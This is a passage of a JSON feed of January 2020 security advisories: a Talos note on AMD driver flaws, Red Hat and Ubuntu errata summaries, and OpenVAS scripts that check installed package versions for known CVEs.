this vulnerability. This vulnerability can be triggered from VMware guest, affecting VMware host. \n\n\n \n\n\nRead the complete vulnerability advisory [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0964>) for additional information. \n \n\n\n### Versions tested\n\nTalos tested and confirmed that these vulnerabilities affect AMD ATIDXX64.DLL, version 26.20.13025.10004 running on the Radeon RX 550 series of graphics cards, while running on VMware Workstation 15, version 15.5.0, build-14665864 with Windows 10 x64 running as the guestVM. \n \n\n\n### Coverage\n\nThe following SNORT\u24c7 rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org. \n \nSnort Rules: 52008, 52009, 52050, 52051, 52367, 52368 \n\n\n \n\n\n", "modified": "2020-01-22T06:15:57", "published": "2020-01-22T06:15:57", "id": "TALOSBLOG:E9EF8812CF8CF7754CD7AD5542FB2103", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/0XSSbjbX5yY/vuln-spotlight-AMD-VM-jan-2020.html", "type": "talosblog", "title": "Vulnerability Spotlight: Multiple vulnerabilities in some AMD graphics cards", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2020-01-23T23:30:24", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* hw: Machine Check Error on Page Size Change (IFU) (CVE-2018-12207)\n\n* hw: TSX Transaction Asynchronous Abort (TAA) (CVE-2019-11135)\n\n* kernel: nfs: use-after-free in svc_process_common() (CVE-2018-16884)\n\n* hw: Intel GPU blitter manipulation can allow for arbitrary kernel memory write (CVE-2019-0155)\n\n* Kernel: vhost_net: infinite loop while receiving packets leads to DoS (CVE-2019-3900)\n\n* Kernel: page cache side channel attacks (CVE-2019-5489)\n\n* hardware: bluetooth: BR/EDR encryption key negotiation attacks (KNOB) (CVE-2019-9506)\n\n* kernel: Heap overflow in mwifiex_uap_parse_tail_ies function in drivers/net/wireless/marvell/mwifiex/ie.c (CVE-2019-10126)\n\n* kernel: heap overflow in mwifiex_update_vs_ie() function of Marvell WiFi driver (CVE-2019-14816)\n\n* Kernel: KVM: OOB memory access via mmio ring buffer (CVE-2019-14821)\n\n* kernel: heap overflow in marvell/mwifiex/tdls.c (CVE-2019-14901)\n\n* hw: Intel GPU Denial Of Service while accessing MMIO in lower power state (CVE-2019-0154)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* Backport TCP follow-up for small buffers (BZ#1739184)\n\n* TCP performance regression after CVE-2019-11478 bug fix (BZ#1743170)\n\n* RHEL8.0 - bnx2x link down, caused by transmit timeouts during load test (Marvell/Cavium/QLogic) (L3:) (BZ#1743548)\n\n* block: blk-mq improvement (BZ#1780567)\n\n* RHEL8.0 - Regression to RHEL7.6 by changing force_latency found during RHEL8.0 validation for SAP HANA on POWER (BZ#1781111)\n\n* blk-mq: overwirte performance drops on real MQ device (BZ#1782183)\n\n* RHEL8: creating vport takes lot of memory i.e 2GB per vport which leads to drain out system memory quickly. (BZ#1782705)", "modified": "2020-01-23T02:15:38", "published": "2020-01-23T02:05:58", "id": "RHSA-2020:0204", "href": "https://access.redhat.com/errata/RHSA-2020:0204", "type": "redhat", "title": "(RHSA-2020:0204) Important: kernel security and bug fix update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-23T23:30:05", "bulletinFamily": "unix", "description": "OpenSLP is an open source implementation of the Service Location Protocol (SLP) which is an Internet Engineering Task Force (IETF) standards track protocol and provides a framework to allow networking applications to discover the existence, location, and configuration of networked services in enterprise networks.\n\nSecurity Fix(es):\n\n* openslp: Heap-based buffer overflow in ProcessSrvRqst() in slpd_process.c leading to remote code execution (CVE-2019-5544)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2020-01-22T17:09:47", "published": "2020-01-22T16:43:37", "id": "RHSA-2020:0199", "href": "https://access.redhat.com/errata/RHSA-2020:0199", "type": "redhat", "title": "(RHSA-2020:0199) Critical: openslp security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-01-23T22:34:39", "bulletinFamily": "unix", "description": "USN-4233-1 disabled SHA1 being used for digital signature operations in GnuTLS. In certain network environments, certificates using SHA1 may still be in use. This update adds the %VERIFY_ALLOW_BROKEN and %VERIFY_ALLOW_SIGN_WITH_SHA1 priority strings that can be used to temporarily re-enable SHA1 until certificates can be replaced with a stronger algorithm.\n\nOriginal advisory details:\n\nAs a security improvement, this update marks SHA1 as being untrusted for digital signature operations.", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "USN-4233-2", "href": "https://usn.ubuntu.com/4233-2/", "title": "GnuTLS update", "type": "ubuntu", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2020-01-23T16:33:17", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562310704608", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704608", "title": "Debian Security Advisory DSA 4608-1 (tiff - security update)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704608\");\n script_version(\"2020-01-23T04:00:06+0000\");\n script_cve_id(\"CVE-2019-14973\", \"CVE-2019-17546\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 04:00:06 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 04:00:06 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Debian Security Advisory DSA 4608-1 (tiff - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB10\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2020/dsa-4608.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4608-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tiff'\n package(s) announced via the DSA-4608-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple integer overflows have been discovered in the libtiff library\nand the included tools.\");\n\n script_tag(name:\"affected\", value:\"'tiff' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the stable distribution (buster), these problems have been fixed in\nversion 4.1.0+git191117-2~deb10u1.\n\nWe recommend that you upgrade your tiff packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libtiff-dev\", ver:\"4.1.0+git191117-2~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libtiff-doc\", ver:\"4.1.0+git191117-2~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libtiff-opengl\", ver:\"4.1.0+git191117-2~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libtiff-tools\", ver:\"4.1.0+git191117-2~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libtiff5\", ver:\"4.1.0+git191117-2~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libtiff5-dev\", ver:\"4.1.0+git191117-2~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libtiffxx5\", ver:\"4.1.0+git191117-2~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-23T16:32:37", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562310844305", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844305", "title": "Ubuntu Update for graphicsmagick USN-4248-1", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844305\");\n script_version(\"2020-01-23T07:59:05+0000\");\n script_cve_id(\"CVE-2017-16545\", \"CVE-2017-16547\", \"CVE-2017-16669\", \"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-17782\", \"CVE-2017-17783\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 07:59:05 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 04:00:25 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Ubuntu Update for graphicsmagick USN-4248-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n script_xref(name:\"USN\", value:\"4248-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2020-January/005283.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'graphicsmagick'\n package(s) announced via the USN-4248-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that GraphicsMagick incorrectly handled certain image files.\nAn attacker could possibly use this issue to cause a denial of service or other\nunspecified impact.\");\n\n script_tag(name:\"affected\", value:\"'graphicsmagick' package(s) on Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick\", ver:\"1.3.23-1ubuntu0.5\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"-q16-12\", ver:\"1.3.23-1ubuntu0.5\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick-q16-3\", ver:\"1.3.23-1ubuntu0.5\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-23T16:32:54", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562310844304", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844304", "title": "Ubuntu Update for python-apt USN-4247-1", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844304\");\n script_version(\"2020-01-23T07:59:05+0000\");\n script_cve_id(\"CVE-2019-15795\", \"CVE-2019-15796\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 07:59:05 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 04:00:24 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Ubuntu Update for python-apt USN-4247-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=(UBUNTU18\\.04 LTS|UBUNTU19\\.10|UBUNTU19\\.04|UBUNTU16\\.04 LTS)\");\n\n script_xref(name:\"USN\", value:\"4247-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2020-January/005282.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python-apt'\n package(s) announced via the USN-4247-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that python-apt would still use MD5 hashes to validate\ncertain downloaded packages. If a remote attacker were able to perform a\nman-in-the-middle attack, this flaw could potentially be used to install\naltered packages. (CVE-2019-15795)\n\nIt was discovered that python-apt could install packages from untrusted\nrepositories, contrary to expectations. (CVE-2019-15796)\");\n\n script_tag(name:\"affected\", value:\"'python-apt' package(s) on Ubuntu 19.10, Ubuntu 19.04, Ubuntu 18.04 LTS, Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"python-apt\", ver:\"1.6.5ubuntu0.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"python3-apt\", ver:\"1.6.5ubuntu0.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU19.10\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"python-apt\", ver:\"1.9.0ubuntu1.2\", rls:\"UBUNTU19.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"python3-apt\", ver:\"1.9.0ubuntu1.2\", rls:\"UBUNTU19.10\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU19.04\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"python-apt\", ver:\"1.8.5~ubuntu0.2\", rls:\"UBUNTU19.04\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"python3-apt\", ver:\"1.8.5~ubuntu0.2\", rls:\"UBUNTU19.04\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"python-apt\", ver:\"1.1.0~beta1ubuntu0.16.04.7\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"python3-apt\", ver:\"1.1.0~beta1ubuntu0.16.04.7\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-01-23T16:32:38", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562310844303", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844303", "title": "Ubuntu Update for zlib USN-4246-1", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844303\");\n script_version(\"2020-01-23T07:59:05+0000\");\n script_cve_id(\"CVE-2016-9840\", \"CVE-2016-9841\", \"CVE-2016-9842\", \"CVE-2016-9843\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 07:59:05 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 04:00:20 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Ubuntu Update for zlib USN-4246-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n script_xref(name:\"USN\", value:\"4246-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2020-January/005284.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'zlib'\n package(s) announced via the USN-4246-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that zlib incorrectly handled pointer arithmetic. An\nattacker\ncould use this issue to cause zlib to crash, resulting in a denial of\nservice, or possibly execute arbitrary code. (CVE-2016-9840, CVE-2016-9841)\n\nIt was discovered that zlib incorrectly handled vectors involving left\nshifts of\nnegative integers. An attacker could use this issue to cause zlib to\ncrash, resulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2016-9842)\n\nIt was discovered that zlib incorrectly handled vectors involving\nbig-endian CRC\ncalculation. An attacker could use this issue to cause zlib to crash,\nresulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2016-9843)\");\n\n script_tag(name:\"affected\", value:\"'zlib' package(s) on Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"lib32z1\", ver:\"1:1.2.8.dfsg-2ubuntu4.3\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"lib64z1\", ver:\"1:1.2.8.dfsg-2ubuntu4.3\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"libn32z1\", ver:\"1:1.2.8.dfsg-2ubuntu4.3\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"libx32z1\", ver:\"1:1.2.8.dfsg-2ubuntu4.3\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"zlib1g\", ver:\"1:1.2.8.dfsg-2ubuntu4.3\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-23T16:33:04", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562310844306", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844306", "title": "Ubuntu Update for python-apt USN-4247-2", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844306\");\n script_version(\"2020-01-23T07:59:05+0000\");\n script_cve_id(\"CVE-2019-15795\", \"CVE-2019-15796\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 07:59:05 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 04:00:32 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Ubuntu Update for python-apt USN-4247-2\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=(UBUNTU18\\.04 LTS|UBUNTU19\\.10|UBUNTU19\\.04|UBUNTU16\\.04 LTS)\");\n\n script_xref(name:\"USN\", value:\"4247-2\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2020-January/005285.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python-apt'\n package(s) announced via the USN-4247-2 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"USN-4247-1 fixed vulnerabilities in python-apt. The updated packages caused\na regression when attempting to upgrade to a new Ubuntu release. This\nupdate fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nIt was discovered that python-apt would still use MD5 hashes to validate\ncertain downloaded packages. If a remote attacker were able to perform a\nman-in-the-middle attack, this flaw could potentially be used to install\naltered packages. (CVE-2019-15795)\nIt was discovered that python-apt could install packages from untrusted\nrepositories, contrary to expectations. (CVE-2019-15796)\");\n\n script_tag(name:\"affected\", value:\"'python-apt' package(s) on Ubuntu 19.10, Ubuntu 19.04, Ubuntu 18.04 LTS, Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"python-apt\", ver:\"1.6.5ubuntu0.2\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"python3-apt\", ver:\"1.6.5ubuntu0.2\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU19.10\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"python-apt\", ver:\"1.9.0ubuntu1.3\", rls:\"UBUNTU19.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"python3-apt\", ver:\"1.9.0ubuntu1.3\", rls:\"UBUNTU19.10\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU19.04\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"python-apt\", ver:\"1.8.5~ubuntu0.3\", rls:\"UBUNTU19.04\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"python3-apt\", ver:\"1.8.5~ubuntu0.3\", rls:\"UBUNTU19.04\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"python-apt\", ver:\"1.1.0~beta1ubuntu0.16.04.8\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"python3-apt\", ver:\"1.1.0~beta1ubuntu0.16.04.8\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-01-23T16:32:37", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", 